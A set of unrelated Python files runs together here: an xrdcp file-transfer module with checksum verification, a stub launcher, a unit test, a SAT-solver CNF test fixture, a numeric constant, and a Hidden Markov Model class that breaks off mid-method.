cmd = "%s -h" % copy_command
if setup:
cmd = "source %s; %s" % (setup, cmd)
logger.info("Execute command (%s) to decide which option should be used to calc/verify file checksum..", cmd)
rcode, stdout, stderr = execute(cmd, **kwargs)
output = stdout + stderr
logger.info("return code: %s", rcode)
logger.debug("return output: %s", output)
coption = ""
checksum_type = 'adler32' ## consider only adler32 for now
if rcode:
logger.error('FAILED to execute command=%s: %s', cmd, output)
else:
if "--cksum" in output:
coption = "--cksum %s:print" % checksum_type
elif "-adler" in output and checksum_type == 'adler32':
coption = "-adler"
elif "-md5" in output and checksum_type == 'md5':
coption = "-md5"
if coption:
logger.info("Use %s option to get the checksum for %s command", coption, copy_command)
return coption
#@timeout(seconds=10800)
def _stagefile(coption, source, destination, filesize, is_stagein, setup=None, **kwargs):
"""
Stage the file (stagein or stageout)
    :return: destination file details (filesize, checksum, checksum_type) on success; raises an exception on failure
:raise: PilotException in case of controlled error
"""
filesize_cmd, checksum_cmd, checksum_type = None, None, None
cmd = '%s -np -f %s %s %s' % (copy_command, coption, source, destination)
if setup:
cmd = "source %s; %s" % (setup, cmd)
#timeout = get_timeout(filesize)
#logger.info("Executing command: %s, timeout=%s" % (cmd, timeout))
rcode, stdout, stderr = execute(cmd, **kwargs)
logger.info('rcode=%d, stdout=%s, stderr=%s', rcode, stdout, stderr)
if rcode: ## error occurred
error = resolve_common_transfer_errors(stdout + stderr, is_stagein=is_stagein)
#rcode = error.get('rcode') ## TO BE IMPLEMENTED
#if not is_stagein and rcode == PilotErrors.ERR_CHKSUMNOTSUP: ## stage-out, on fly checksum verification is not supported .. ignore
# logger.info('stage-out: ignore ERR_CHKSUMNOTSUP error .. will explicitly verify uploaded file')
# return None, None
raise PilotException(error.get('error'), code=error.get('rcode'), state=error.get('state'))
# extract filesize and checksum values from output
if coption != "":
filesize_cmd, checksum_cmd, checksum_type = get_file_info_from_output(stdout + stderr)
## verify transfer by returned checksum or call remote checksum calculation
## to be moved at the base level
is_verified = True ## TO BE IMPLEMENTED LATER
if not is_verified:
rcode = ErrorCodes.GETADMISMATCH if is_stagein else ErrorCodes.PUTADMISMATCH
raise PilotException("Copy command failed", code=rcode, state='AD_MISMATCH')
return filesize_cmd, checksum_cmd, checksum_type
# @timeout(seconds=10800)
def copy_in(files, **kwargs):
"""
Download given files using xrdcp command.
:param files: list of `FileSpec` objects
:raise: PilotException in case of controlled error
"""
#allow_direct_access = kwargs.get('allow_direct_access') or False
setup = kwargs.pop('copytools', {}).get('xrdcp', {}).get('setup')
coption = _resolve_checksum_option(setup, **kwargs)
trace_report = kwargs.get('trace_report')
    # note: env vars might be unknown inside middleware containers; if so, use the value already stored in the trace report
localsite = os.environ.get('RUCIO_LOCAL_SITE_ID', trace_report.get_value('localSite'))
for fspec in files:
# update the trace report
localsite = localsite if localsite else fspec.ddmendpoint
trace_report.update(localSite=localsite, remoteSite=fspec.ddmendpoint, filesize=fspec.filesize)
trace_report.update(filename=fspec.lfn, guid=fspec.guid.replace('-', ''))
trace_report.update(scope=fspec.scope, dataset=fspec.dataset)
# continue loop for files that are to be accessed directly ## TOBE DEPRECATED (anisyonk)
#if fspec.is_directaccess(ensure_replica=False) and allow_direct_access and fspec.accessmode == 'direct':
# fspec.status_code = 0
# fspec.status = 'remote_io'
# trace_report.update(url=fspec.turl, clientState='FOUND_ROOT', stateReason='direct_access')
# trace_report.send()
# continue
trace_report.update(catStart=time())
dst = fspec.workdir or kwargs.get('workdir') or '.'
destination = os.path.join(dst, fspec.lfn)
try:
filesize_cmd, checksum_cmd, checksum_type = _stagefile(coption, fspec.turl, destination, fspec.filesize,
is_stagein=True, setup=setup, **kwargs)
fspec.status_code = 0
fspec.status = 'transferred'
except PilotException as error:
fspec.status = 'failed'
fspec.status_code = error.get_error_code()
diagnostics = error.get_detail()
state = 'STAGEIN_ATTEMPT_FAILED'
trace_report.update(clientState=state, stateReason=diagnostics, timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
else:
# compare checksums
fspec.checksum[checksum_type] = checksum_cmd # remote checksum
state, diagnostics = verify_catalog_checksum(fspec, destination)
if diagnostics != "":
trace_report.update(clientState=state or 'STAGEIN_ATTEMPT_FAILED', stateReason=diagnostics,
timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
trace_report.update(clientState='DONE', stateReason='OK', timeEnd=time())
trace_report.send()
return files
# @timeout(seconds=10800)
def copy_out(files, **kwargs):
"""
Upload given files using xrdcp command.
:param files: list of `FileSpec` objects
:raise: PilotException in case of controlled error
"""
setup = kwargs.pop('copytools', {}).get('xrdcp', {}).get('setup')
coption = _resolve_checksum_option(setup, **kwargs)
trace_report = kwargs.get('trace_report')
for fspec in files:
trace_report.update(scope=fspec.scope, dataset=fspec.dataset, url=fspec.surl, filesize=fspec.filesize)
trace_report.update(catStart=time(), filename=fspec.lfn, guid=fspec.guid.replace('-', ''))
try:
filesize_cmd, checksum_cmd, checksum_type = _stagefile(coption, fspec.surl, fspec.turl, fspec.filesize,
is_stagein=False, setup=setup, **kwargs)
fspec.status_code = 0
fspec.status = 'transferred'
trace_report.update(clientState='DONE', stateReason='OK', timeEnd=time())
trace_report.send()
except PilotException as error:
fspec.status = 'failed'
fspec.status_code = error.get_error_code()
state = 'STAGEOUT_ATTEMPT_FAILED'
diagnostics = error.get_detail()
trace_report.update(clientState=state, stateReason=diagnostics, timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
else:
# compare checksums
fspec.checksum[checksum_type] = checksum_cmd # remote checksum
state, diagnostics = verify_catalog_checksum(fspec, fspec.surl)
if diagnostics != "":
                trace_report.update(clientState=state or 'STAGEOUT_ATTEMPT_FAILED', stateReason=diagnostics,
timeEnd=time())
trace_report.send()
raise PilotException(diagnostics, code=fspec.status_code, state=state)
return files
def get_file_info_from_output(output):
"""
Extract file size, checksum value from xrdcp --chksum command output
:return: (filesize [int/None], checksum, checksum_type) or (None, None, None) in case of failure
"""
if not output:
return None, None, None
if not ("xrootd" in output or "XRootD" in output or "adler32" in output):
logger.warning("WARNING: Failed to extract checksum: Unexpected output: %s", output)
return None, None, None
pattern = r"(?P<type>md5|adler32):\ (?P<checksum>[a-zA-Z0-9]+)\ \S+\ (?P<filesize>[0-9]+)" # Python 3 (added r)
filesize, checksum, checksum_type = None, None, None
m = re.search(pattern, output)
if m:
checksum_type = m.group('type')
checksum = m.group('checksum')
checksum = checksum.zfill(8) # make it 8 chars length (adler32 xrdcp fix)
filesize = m.group('filesize')
if filesize:
try:
filesize = int(filesize)
except ValueError as error:
logger.warning('failed to convert filesize to int: %s', error)
filesize = None
else:
logger.warning("WARNING: Checksum/file size info not found in output: failed to match pattern=%s in output=%s", pattern, output)
return filesize, checksum, checksum_type
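# Hedged usage sketch (not part of the original module): feeding a hypothetical
# "xrdcp --cksum adler32:print" output line into get_file_info_from_output() should
# yield the (filesize, checksum, checksum_type) tuple described in its docstring.
# The sample string below is an assumption for illustration only:
#   get_file_info_from_output("adler32: 3f1d2e4a /some/dir/file.root 1048576")
#   # -> (1048576, '3f1d2e4a', 'adler32')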
|
"""
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
"""
# -------------------------------------------------------------------------
"""DCCsi Tool and Application service launcher"""
def start_service():
"""Not Implemented"""
print('DCCsi.Tools.DCC.start_service() not implemented')
return None
###########################################################################
# Main Code Block, runs this script as main (testing)
# -------------------------------------------------------------------------
if __name__ == '__main__':
"""Run this file as main"""
start_service() |
import unittest
from metis.Constants import Constants
class ConstantsTest(unittest.TestCase):
def test_lookup(self):
self.assertEqual(Constants[Constants.DONE], "Constants.DONE")
self.assertEqual(Constants.get_name(Constants.DONE), "Constants.DONE")
if __name__ == "__main__":
unittest.main()
|
input = """
c num blocks = 1
c num vars = 200
c minblockids[0] = 1
c maxblockids[0] = 200
p cnf 200 810
51 12 -4 0
-15 -9 7 0
-91 57 -17 0
-89 -69 197 0
4 68 113 0
-25 2 168 0
43 146 -61 0
-84 -200 88 0
-70 112 -96 0
131 18 72 0
97 161 -193 0
44 41 -80 0
194 -11 -116 0
-126 -162 65 0
-84 183 -155 0
-172 -122 135 0
-52 -189 31 0
-186 57 151 0
110 -66 -6 0
46 176 45 0
37 -3 -181 0
-106 34 171 0
32 188 126 0
10 -148 120 0
-113 -26 180 0
-153 -56 192 0
-88 59 193 0
-183 176 185 0
27 -112 86 0
-73 -4 -71 0
-77 -131 31 0
-52 74 -106 0
-40 10 -158 0
-127 31 -44 0
-47 109 -103 0
-73 82 122 0
178 119 -54 0
-70 -31 -47 0
-91 28 -99 0
-16 -8 181 0
168 -73 180 0
-170 120 -190 0
81 -174 195 0
-46 3 -77 0
-102 10 -66 0
102 131 163 0
-42 -10 43 0
-188 -164 -61 0
-111 157 -60 0
158 19 72 0
21 -29 -181 0
23 -11 177 0
-26 -131 -67 0
-97 122 -185 0
27 -113 -56 0
55 129 155 0
-126 -117 -167 0
25 115 -90 0
-66 171 -95 0
36 7 46 0
-33 65 -32 0
58 157 144 0
-39 67 190 0
-90 160 142 0
52 81 -200 0
-35 93 123 0
-98 -114 200 0
115 140 98 0
33 102 10 0
-121 32 -132 0
-72 -110 61 0
165 81 123 0
42 -142 55 0
105 -70 94 0
101 159 14 0
136 43 -104 0
-25 -11 -94 0
65 -69 -60 0
-188 -24 -58 0
32 -59 -150 0
168 148 44 0
-66 64 109 0
-29 -98 -105 0
-180 108 -154 0
-61 -174 -197 0
108 -196 138 0
76 -22 -125 0
-191 93 83 0
96 -12 -4 0
73 61 196 0
151 -6 -40 0
167 163 48 0
-62 132 178 0
174 -157 -40 0
191 151 62 0
-163 -113 126 0
-107 95 167 0
188 197 130 0
43 136 -46 0
7 -151 194 0
24 39 -168 0
-178 -190 174 0
-119 -53 63 0
41 179 -77 0
-161 -23 74 0
-149 -12 -173 0
83 91 82 0
-10 182 80 0
-33 162 30 0
-56 -93 44 0
-101 87 127 0
-180 197 98 0
187 142 -160 0
-14 -155 198 0
115 -34 -107 0
154 -153 121 0
102 175 157 0
-82 53 174 0
132 116 -96 0
-128 186 67 0
-109 -112 -10 0
113 -17 -36 0
-50 -55 48 0
44 -131 187 0
176 26 -152 0
10 -164 -110 0
-166 62 -180 0
-157 71 169 0
30 -111 -28 0
-84 102 155 0
128 -16 -119 0
-135 34 195 0
-128 -157 -34 0
58 -97 -169 0
143 -141 196 0
15 -37 98 0
-83 36 -62 0
104 -95 -191 0
-49 135 106 0
-52 -5 -29 0
63 -177 -3 0
-124 32 177 0
-161 -60 132 0
13 -3 133 0
125 -159 172 0
46 48 -7 0
-189 66 38 0
140 188 86 0
65 178 -20 0
195 -94 -117 0
121 80 -76 0
-97 15 84 0
-118 28 -186 0
37 -39 60 0
-110 14 -72 0
-153 -200 107 0
36 1 -200 0
-106 175 170 0
26 -35 -80 0
37 184 -52 0
22 -112 5 0
21 166 103 0
80 -140 -62 0
-138 -130 -97 0
-131 129 177 0
-153 4 -22 0
195 -89 114 0
120 65 36 0
-43 199 37 0
-149 158 33 0
183 -180 -115 0
122 188 80 0
-195 21 -179 0
134 -97 -49 0
-199 107 -65 0
23 -86 -126 0
92 -128 -72 0
128 -85 -83 0
164 182 11 0
-122 -133 -148 0
71 120 -144 0
69 121 -190 0
-156 107 82 0
102 199 -85 0
-179 -173 -153 0
-24 -151 54 0
40 92 -58 0
-142 184 -170 0
196 -192 199 0
-110 22 130 0
-51 196 -34 0
-186 101 142 0
151 101 22 0
-191 -8 -17 0
118 -178 160 0
-199 24 -113 0
-108 -37 -90 0
121 -13 194 0
-69 -179 -124 0
-198 -69 37 0
176 86 -63 0
116 44 -29 0
144 141 -91 0
-24 118 147 0
-57 100 75 0
-153 32 53 0
21 -143 -105 0
-152 167 -178 0
-187 105 183 0
167 149 41 0
-200 -65 105 0
-148 -102 46 0
200 -94 -115 0
-72 25 -185 0
-39 192 143 0
120 15 -160 0
184 -133 124 0
163 151 -130 0
-152 -14 200 0
-200 -198 43 0
-23 -141 97 0
140 -12 -30 0
26 -167 199 0
190 -127 163 0
30 46 -146 0
-74 48 30 0
-51 8 -85 0
61 120 193 0
18 -137 193 0
61 149 -2 0
57 109 -188 0
-155 109 58 0
50 95 -5 0
-190 -200 52 0
143 17 -185 0
159 172 174 0
-31 152 84 0
-53 -18 -116 0
198 -155 -196 0
136 -153 -106 0
135 -123 -24 0
-23 25 -154 0
109 -41 176 0
-97 192 83 0
-176 23 158 0
-84 -80 95 0
6 -135 -50 0
54 85 -163 0
-70 81 137 0
66 113 -129 0
104 11 -73 0
-74 -163 -140 0
128 174 183 0
-197 -133 173 0
16 -125 -123 0
21 60 -83 0
37 131 35 0
184 -129 -93 0
196 -43 66 0
132 -170 175 0
23 -17 -147 0
61 4 93 0
114 131 123 0
-186 -50 144 0
44 9 187 0
59 -143 -168 0
172 169 -192 0
118 123 181 0
63 -177 -182 0
9 17 65 0
31 17 170 0
-192 -181 -79 0
86 151 82 0
-67 -73 -63 0
113 193 -6 0
-44 -140 187 0
112 -14 -109 0
23 -198 -119 0
73 -128 159 0
-15 35 107 0
83 116 25 0
-134 -54 80 0
-41 70 -128 0
-35 -76 -155 0
-139 15 200 0
-74 84 27 0
102 -156 -112 0
-81 95 197 0
-99 -98 -186 0
11 -51 129 0
127 94 -30 0
41 173 182 0
162 22 -102 0
-196 -122 -49 0
46 160 -64 0
-183 105 155 0
-164 -87 -107 0
83 -4 74 0
138 45 -122 0
-107 32 25 0
55 -70 146 0
38 157 -34 0
193 -145 188 0
55 101 185 0
-59 168 184 0
75 -58 -96 0
-159 -57 121 0
33 -111 12 0
74 136 144 0
-177 68 -40 0
34 -119 105 0
-87 -86 55 0
-186 -85 -64 0
-40 176 -16 0
-9 -82 110 0
-143 89 -55 0
192 171 -87 0
100 189 -11 0
-124 -117 -46 0
22 130 55 0
-153 -83 19 0
-176 -41 121 0
-97 31 64 0
-93 186 74 0
35 -13 56 0
178 14 -104 0
-35 170 132 0
-70 -160 -8 0
-42 181 -81 0
161 -17 -46 0
-139 130 117 0
167 42 -115 0
-2 -118 149 0
99 -72 -49 0
-127 161 49 0
-140 -39 -172 0
151 -118 -117 0
-53 102 50 0
-115 63 -96 0
43 -24 -152 0
101 -84 -184 0
-144 -185 -87 0
158 -133 -107 0
4 47 190 0
-194 -152 -109 0
81 56 -8 0
-94 -63 73 0
-11 -74 18 0
-88 -126 -95 0
-56 -111 95 0
-166 52 156 0
105 -71 -168 0
143 86 118 0
-185 -125 -136 0
-170 -117 67 0
-124 -163 60 0
-142 -52 -4 0
13 -27 154 0
-182 159 -163 0
-200 110 -184 0
178 -91 -164 0
118 34 -151 0
-26 -73 -101 0
27 125 -119 0
-103 147 96 0
-38 8 14 0
149 43 -3 0
199 149 93 0
-18 40 136 0
-48 52 -167 0
69 151 -47 0
182 61 -151 0
-118 106 6 0
-32 53 40 0
-181 196 94 0
64 12 164 0
-53 91 149 0
-120 183 -194 0
128 131 -87 0
-34 -110 -122 0
121 -45 99 0
127 142 -22 0
-61 84 -110 0
16 -116 90 0
66 -115 -189 0
-159 -182 149 0
126 62 86 0
181 33 -75 0
-175 82 151 0
38 -69 18 0
-168 -5 177 0
-61 79 -180 0
23 -102 167 0
-78 185 53 0
-130 58 -178 0
136 -116 -56 0
-125 -185 -116 0
-166 -47 64 0
35 -156 68 0
196 -171 102 0
23 62 -25 0
62 15 -161 0
90 43 -5 0
-29 -94 -193 0
-18 -111 -56 0
-88 -19 193 0
-138 39 -137 0
53 2 -200 0
-9 25 -20 0
92 5 39 0
99 196 50 0
-122 -66 -51 0
117 57 132 0
-46 -188 9 0
-61 -58 57 0
196 -199 -67 0
-46 64 52 0
-194 165 20 0
-110 -88 121 0
190 -80 -111 0
-4 -87 192 0
149 -187 178 0
-33 -1 62 0
171 159 -114 0
-63 -130 158 0
126 68 -47 0
-85 72 -149 0
-161 -121 -185 0
-90 -137 -144 0
-43 -56 165 0
96 -143 187 0
-43 -196 -170 0
-151 -95 -18 0
64 21 134 0
78 -174 -122 0
7 -78 -37 0
-71 157 1 0
-50 56 -94 0
-120 172 -108 0
131 -11 118 0
-40 21 -36 0
112 -165 88 0
-122 65 174 0
-58 -136 -121 0
134 -27 -157 0
-55 163 -72 0
59 34 72 0
143 47 -11 0
112 -63 171 0
190 -41 114 0
151 -103 13 0
141 44 90 0
6 198 19 0
-164 177 1 0
-36 34 -20 0
198 159 107 0
-31 158 -3 0
196 -42 10 0
-26 116 -54 0
79 -46 -126 0
94 -164 81 0
-184 -136 -147 0
48 64 2 0
-17 -50 86 0
89 -127 -200 0
-187 128 -41 0
-157 -189 -12 0
-14 -124 69 0
-50 7 158 0
89 35 -170 0
147 -187 19 0
-82 126 -114 0
-23 30 -121 0
50 -25 -110 0
-163 166 -132 0
-96 -45 -78 0
14 -168 98 0
166 -98 -100 0
-61 -36 -25 0
10 170 -40 0
130 173 106 0
-103 -96 -104 0
-142 -16 117 0
-101 82 -51 0
127 -6 -181 0
118 157 -56 0
126 -25 3 0
176 5 -44 0
149 27 -70 0
46 -73 117 0
115 177 -104 0
-194 61 19 0
-150 160 -55 0
-5 80 -72 0
-170 -107 191 0
-136 -144 -156 0
172 37 -116 0
-143 68 163 0
112 15 141 0
-99 -128 162 0
-127 -186 -51 0
103 3 189 0
-180 -16 128 0
105 -82 115 0
70 -15 73 0
-5 -168 -57 0
-146 164 82 0
-175 158 40 0
11 -33 35 0
72 -160 -166 0
23 55 181 0
161 -54 -165 0
156 28 123 0
-5 -105 -126 0
193 102 -200 0
-2 47 90 0
190 52 -27 0
85 57 -58 0
166 -143 3 0
-58 -143 -109 0
163 92 -35 0
114 -26 188 0
5 83 -6 0
123 101 -80 0
111 173 26 0
128 169 182 0
75 -121 -183 0
66 -178 -136 0
-134 99 -200 0
-103 183 -115 0
-110 -136 -118 0
-150 -189 112 0
-90 30 54 0
-82 123 156 0
187 -193 139 0
-153 -147 197 0
-167 105 -22 0
-134 193 47 0
-17 -47 150 0
170 -200 -198 0
23 99 -136 0
42 -52 100 0
-18 129 154 0
65 177 135 0
48 51 165 0
-48 176 194 0
10 -38 54 0
99 -129 195 0
-95 20 -52 0
161 198 -60 0
135 -155 184 0
-89 -141 19 0
-31 184 -40 0
82 -91 121 0
-112 186 84 0
-24 14 -135 0
-7 134 160 0
10 28 101 0
-34 121 -165 0
-51 46 21 0
-94 -99 -62 0
-73 -146 115 0
10 9 40 0
-198 -120 -192 0
87 127 -139 0
141 -7 74 0
-90 85 -170 0
-119 -200 -64 0
18 -133 -144 0
171 -7 196 0
-107 -186 144 0
-196 37 -22 0
198 40 46 0
-197 -131 -138 0
-100 194 135 0
-91 196 -139 0
164 143 101 0
101 71 192 0
-130 -63 -188 0
170 -163 73 0
-95 50 -54 0
-102 -27 -108 0
-52 141 -69 0
68 -161 -153 0
-49 -66 28 0
-116 200 -193 0
-169 -18 159 0
-145 -149 -105 0
-126 109 -38 0
-41 142 -2 0
-64 -146 92 0
82 -161 -197 0
-17 47 153 0
194 6 2 0
84 -143 -145 0
-14 8 -122 0
-76 -40 -59 0
54 -162 99 0
-151 -57 119 0
-136 60 132 0
72 -6 64 0
144 193 88 0
-68 108 -36 0
-12 63 -167 0
12 -122 -102 0
30 -165 -37 0
198 29 26 0
9 -171 -18 0
170 -77 -183 0
-149 -116 29 0
-34 5 116 0
60 127 -148 0
146 -192 17 0
-44 -13 -8 0
155 -25 -188 0
31 -163 53 0
-45 165 36 0
122 24 92 0
36 4 161 0
-88 110 173 0
-136 -171 122 0
192 -135 -84 0
-34 -90 -99 0
-31 -29 -102 0
52 185 -97 0
-52 66 56 0
35 63 -40 0
-8 -185 134 0
124 -63 -24 0
83 -133 -180 0
126 -196 168 0
67 -63 -96 0
111 185 174 0
128 -131 -43 0
-114 -173 -154 0
120 35 -124 0
192 56 -31 0
118 194 139 0
-195 64 71 0
-103 147 -84 0
147 -114 116 0
-84 -200 -59 0
184 -198 -89 0
-124 -111 110 0
-186 100 -198 0
-151 -143 74 0
13 173 -52 0
-38 114 -177 0
-75 10 89 0
175 -152 -48 0
164 59 160 0
-151 58 -171 0
85 176 -109 0
-35 -79 41 0
178 75 -71 0
170 -88 -84 0
-67 -160 -33 0
44 140 79 0
-46 -142 29 0
-43 -102 -108 0
197 71 163 0
158 -87 -139 0
101 29 48 0
-3 38 193 0
9 142 152 0
116 121 21 0
14 133 21 0
-193 -9 197 0
2 28 -111 0
171 116 110 0
-184 25 62 0
88 138 -92 0
56 97 -59 0
107 85 26 0
146 111 91 0
-31 162 145 0
-81 119 -106 0
19 55 -77 0
59 -90 96 0
107 -131 -25 0
-32 48 -135 0
2 150 -58 0
-66 -99 -83 0
-9 -32 79 0
62 -29 49 0
21 -154 -72 0
-139 -144 -192 0
-36 141 -43 0
133 -72 19 0
43 -104 -28 0
151 -42 -195 0
182 -144 -9 0
-24 54 -62 0
-164 127 -136 0
-188 129 60 0
140 77 -31 0
-100 -36 28 0
-59 81 7 0
-67 -90 -60 0
-95 155 135 0
-53 89 -174 0
52 -158 -180 0
131 -63 -193 0
-176 -128 -175 0
10 -131 98 0
123 138 -149 0
-2 -143 181 0
-165 137 148 0
173 -191 -97 0
-198 -36 -73 0
-73 -191 -140 0
-73 -167 154 0
149 -6 -32 0
-47 -165 -102 0
-121 -173 146 0
198 -39 180 0
-63 32 -25 0
161 43 -170 0
-183 -83 -55 0
-179 96 31 0
-132 194 -154 0
-106 -91 23 0
63 45 66 0
178 120 -21 0
-127 10 -144 0
1 -31 -27 0
-68 -13 -168 0
145 103 -138 0
10 181 75 0
164 128 -11 0
-164 15 -77 0
-103 -144 -113 0
171 7 140 0
-170 101 -129 0
134 75 -113 0
-130 58 41 0
87 63 91 0
-157 -148 101 0
-150 -148 101 0
167 -51 -152 0
-104 -6 163 0
65 -98 -188 0
-108 137 -110 0
-37 -150 177 0
137 -193 -6 0
-171 -177 32 0
162 -97 56 0
35 -26 143 0
-60 -127 -165 0
-160 -61 11 0
-94 32 -190 0
101 15 -169 0
68 62 -94 0
55 5 -126 0
-105 69 -192 0
115 149 -198 0
-73 190 31 0
-154 97 -91 0
-91 85 -40 0
92 -173 -23 0
82 -39 192 0
-55 178 -156 0
-31 185 93 0
113 -99 -85 0
184 93 -135 0
170 -92 -176 0
60 -183 194 0
90 -11 59 0
6 -78 88 0
156 -198 51 0
148 134 -15 0
-62 -71 -85 0
170 68 -133 0
82 -95 -122 0
114 -133 -75 0
170 27 -151 0
-64 127 121 0
102 175 -122 0
-69 -139 165 0
183 37 47 0
-172 76 -187 0
-120 -182 27 0
33 129 102 0
-4 -162 36 0
143 -58 -79 0
146 120 35 0
80 -99 -108 0
-39 138 64 0
125 -97 -59 0
-81 75 164 0
158 -70 108 0
113 -124 122 0
138 -198 133 0
45 67 -183 0
44 -155 30 0
151 2 92 0
-11 -19 -83 0
44 -179 31 0
-115 -184 70 0
181 12 90 0
12 188 -7 0
-138 174 189 0
159 -99 56 0
-47 78 87 0
-117 -177 47 0
-80 -186 -135 0
94 196 145 0
-58 -132 -20 0
78 69 -102 0
-58 146 -123 0
"""
output = "SAT"
|
""" Useful numerical constants.
Attributes
----------
inf_bound : float
This parameter is intended to be used to denote a infinite bound on
a design variable or constraint. The default value of 2.0e20 is
large enough that it will trigger special treatment of the bound
as infinite by optimizers like SNOPT and IPOPT, but is not so large
as to cause overflow/underflow errors as numpy.inf sometimes can.
"""
inf_bound = 2.0e20
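# Hedged usage sketch (illustrative only, not part of the original module): an
# optimizer-facing call would pass inf_bound where a variable or constraint is
# effectively unbounded, e.g. something along the lines of
#   driver.add_design_var('x', lower=0.0, upper=inf_bound)
# (`driver.add_design_var` is an assumed, hypothetical API used purely to show intent).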
|
import numpy as np
import hiddenmm.model.markov_chain as mc
import hiddenmm.constants as constants
import hiddenmm.numeric_util as nutil
class DiscreteHiddenMM:
""" Class implementing a discrete Hidden Markov Model """
def __init__(self, markov_chain: mc.MarkovChain, projection: np.ndarray):
self.markov_chain = markov_chain
self.projection = projection
self.num_outputs = self.projection.shape[1]
if self.markov_chain.num_states != projection.shape[0]:
raise ValueError("Dimension mismatch: projection dies not match number of states of Markov Chain")
if not np.all((self.projection.sum(axis=1) - 1.0) < constants.EPSILON):
raise ValueError("Projection matrix distribution does not sum up to one.")
if not np.all(self.projection >= 0.0):
raise ValueError("Projection matrix distribution must be positive.")
@property
def num_states(self) -> int:
""" Number of markov chain states """
return self.markov_chain.num_states
@property
def initial_distribution(self) -> np.ndarray:
""" Initial state probability distribution """
return self.markov_chain.initial
@property
def transition_matrix(self) -> np.ndarray:
""" Markov Chain transition matrix """
return self.markov_chain.transition_matrix
def generate(self, n: int) -> np.ndarray:
""" Generate given markov model """
underlying_chain = self.markov_chain.generate(n)
result = []
for i in range(n):
result.append(np.random.choice(self.num_outputs, p=self.projection[underlying_chain[i]]))
return np.vstack([underlying_chain, np.array(result, dtype=int)]).T
def _helper_alpha(self, observations: np.ndarray, stable=False) -> (np.ndarray, np.ndarray):
""" Return a helper "alpha" variable matrix over time for given observation series """
alpha = np.zeros((observations.shape[0], self.num_states), dtype=float)
multipliers = np.ones(observations.shape[0], dtype=float)
# Initialization
alpha[0] = self.initial_distribution * self.projection[:, observations[0]]
if stable:
alpha[0], multipliers[0] = nutil.rescale_vector(alpha[0])
# Induction
for i in range(1, observations.shape[0]):
alpha[i] = (alpha[i-1] @ self.transition_matrix) * self.projection[:, observations[i]]
if stable:
alpha[i], multipliers[i] = nutil.rescale_vector(alpha[i])
return alpha, multipliers
def _helper_beta(self, observations: np.ndarray, stable=False) -> (np.ndarray, np.ndarray):
""" Return a helper "beta" variable matrix over time for given observation series """
beta = np.zeros((observations.shape[0], self.num_states), dtype=float)
multipliers = np.ones(observations.shape[0], dtype=float)
# Initialization
beta[observations.shape[0]-1] = 1.0
multipliers[observations.shape[0]-1] = 1.0
# Induction
for i in range(observations.shape[0] - 1, 0, -1):
beta[i-1] = self.transition_matrix @ (self.projection[:, observations[i]] * beta[i])
if stable:
beta[i-1], multipliers[i-1] = nutil.rescale_vector(beta[i-1])
return beta, multipliers
def _helper_delta_psi(self, observations: np.ndarray, stable=False) -> (np.ndarray, np.ndarray):
""" Return a helper "delta" variable matrix over time for given observation series """
delta = np.zeros((observations.shape[0], self.num_states), dtype=float)
psi = np.zeros((observations.shape[0], self.num_states), dtype=int)
if stable:
delta[0] = np.log(self.initial_distribution) + np.log(self.projection[:, observations[0]])
else:
delta[0] = self.initial_distribution * self.projection[:, observations[0]]
for i in range(1, observations.shape[0]):
# Reshape the buffer to make sure the multiplication is broadcasted correctly
previous_step = delta[i-1].reshape((self.num_states, 1))
if stable:
local_likelihoods = previous_step + np.log(self.transition_matrix)
else:
local_likelihoods = previous_step * self.transition_matrix
new_likelihood = local_likelihoods.max(axis=0)
psi[i] = local_likelihoods.argmax(axis=0)
if stable:
delta[i] = new_likelihood + np.log(self.projection[:, observations[i]])
else:
delta[i] = new_likelihood * self.projection[:, observations[i]]
return delta, psi
def likelihood(self, observations: np.ndarray) -> float:
""" Return likelihood of supplied observation series """
dimension = observations.shape[0]
# Short-circuit
if dimension == 0:
return 0.0
alpha, multipliers = self._helper_alpha(observations, stable=False)
return alpha[-1].sum()
def log_likelihood(self, observations: np.ndarray, stable=True) -> float:
""" Return likelihood of supplied observation series """
dimension = observations.shape[0]
# Short-circuit
if dimension == 0:
return 0.0
alpha, multipliers = self._helper_alpha(observations, stable=stable)
return np.log(alpha[-1].sum()) - np.log(multipliers).sum()
def solve_for_states(self, observations: np.ndarray, stable=True) -> np.ndarray:
""" Solve for the most probable state sequence for given observation series """
dimension = observations.shape[0]
# Short-circuit
if dimension == 0:
return np.array([], dtype=int)
delta, psi = self._helper_delta_psi(observations, stable=stable)
result = []
final_state = np.argmax(delta[dimension-1])
result.append(final_state)
current_state = final_state
# Walk through the time back and reconstruct the state sequence
for i in range(dimension-1, 0, -1):
if stable:
if delta[i][current_state] <= -np.inf:
raise ValueError("Impossible observation sequence [likelihood = 0].")
else:
if delta[i][current_state] <= 0.0:
raise ValueError("Impossible observation sequence [likelihood = 0].")
current_state = psi[i][current_state]
result.append(current_state)
return np.array(result[::-1], dtype=int)
def fit_single(self, observations: np.ndarray, stable=True) -> 'DiscreteHiddenMM':
""" Perform an expectation-maximization procedure on the hidden markov chain model """
dimension = observations.shape[0]
if dimension > 0:
# Helper variables
alpha, alpha_multipliers = self._helper_alpha(observations, stable=stable)
beta, beta_multipliers = self._helper_beta(observations, stable=stable)
# Output will be stored in these variables
new_initial_distribution = np.zeros(self.num_states, dtype=float)
new_transition_numerator = np.zeros((self.num_states, self.num_states), dtype=float)
new_transition_denominator = np.zeros((self.num_states, self.num_states), dtype=float)
new_projection_numerator = np.zeros((self.num_states, self.num_outputs), dtype=float)
new_projection_denominator = np.zeros((self.num_states, self.num_outputs), dtype=float)
# The actual content of the algorithm is iterating the xi matrix through time
for i in range(dimension):
gamma = (alpha[i] * beta[i]) / (alpha[i] * beta[i]).sum()
# This piece is only executed in the first step
if i == 0:
new_initial_distribution = gamma
# We have to skip the last step as there are one less transitions than observations
if i < dimension - 1:
xi_numerator = (
self.transition_matrix *
np.outer(alpha[i], self.projection[:, observations[i+1]] * beta[i+1])
)
xi = xi_numerator / xi_numerator.sum()
new_transition_numerator += xi
new_transition_denominator += gamma.reshape((self.num_states, 1))
new_projection_numerator[:, observations[i]] += gamma
new_projection_denominator += gamma.reshape((self.num_states, 1))
new_transition = new_transition_numerator / new_transition_denominator
new_projection = new_projection_numerator / new_projection_denominator
# A way to handle divisions 0/0
